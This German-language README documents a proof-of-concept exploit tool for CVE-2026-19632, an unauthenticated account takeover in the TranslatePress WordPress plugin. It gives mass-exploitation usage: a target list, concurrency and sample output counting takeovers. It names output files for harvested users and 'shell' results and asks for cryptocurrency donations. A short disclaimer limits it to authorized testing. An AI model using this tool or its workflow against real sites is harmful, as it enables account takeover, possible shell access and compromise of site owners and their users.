
PoC für CVE-2026-19632 - TranslatePress – Multilingual <= 3.3.1 - Nicht authentifizierte Kontokompromittierung durch Offenlegung des Passwort-Reset-Links
Unauthentifizierte Kontoübernahme durch Offenlegung von Passwort-Reset-Links
Wenn du meine Arbeit schätzt, unterstütze das Projekt bitte per USDT (TRC20): TQBA72kakjCZLnJt8fJYcD7dyQCEpzNtVN
Eine vollständige Video-Durchführung und Demonstration des Skripts ist hier verfügbar:
CVE-2026-19632 ist eine kritische Schwachstelle zur unauthentifizierten Kontoübernahme, die das TranslatePress – Multilingual WordPress-Plugin betrifft.
## 🚀 Verwendung
Erstelle eine Datei `list.txt`, die ein Ziel pro Zeile enthält:
```text
https://target1.example
https://target2.example
https://target3.example
Ausführen:
python3 CVE-2026-19632.py
Das Tool fragt ab:
[?] targets file (list.txt):
Eingeben:
list.txt
Dann:
[?] concurrency (5):
Drücke Enter, um die Standard-Parallelität von 5 zu verwenden.
$ python3 CVE-2026-19632.py
[?] targets file (list.txt): list.txt
[+] 3 targets loaded
[?] concurrency (5): 5
[*] https://target1.example
nonce: xxxxxxxxxxxx... langs: en_US,fr_FR default: en_US
users: admin
[1/3] TAKEOVER:0 VULN:1 SAFE:0 ERROR:0
TAKEOVER Übernahmephase erreicht
VULN Verwundbarer Zustand erkannt
SAFE Ziel entsprach nicht den verwundbaren Bedingungen
ERROR Beim Verarbeiten des Ziels ist ein Fehler aufgetreten
Das Tool verwendet:
list.txt Zielliste
users.txt Erkannte Benutzer
shells.txt Shell-bezogene Ergebnisse
⚠️ Nur für autorisierte Sicherheitsforschung und Tests.
📚 Referenzen CVE-Eintrag: https://www.cve.org/CVERecord?id=CVE-2026-19632 Wordfence-Hinweis: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/translatepress-multilingual/translatepress-multilingual-331-unauthenticated-account-takeover-via-password-reset-link-disclosure TranslatePress: https://wordpress.org/plugins/translatepress-multilingual/ ⚖️ Haftungsausschluss
Dieses Projekt wird für Sicherheitsforschung, Schwachstellenanalyse, defensive Tests und autorisierte Penetrationstests bereitgestellt.
Verwende diese Forschung nicht gegen Systeme ohne ausdrückliche Autorisierung.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Material verursacht werden.
TranslatePress <= 3.3.1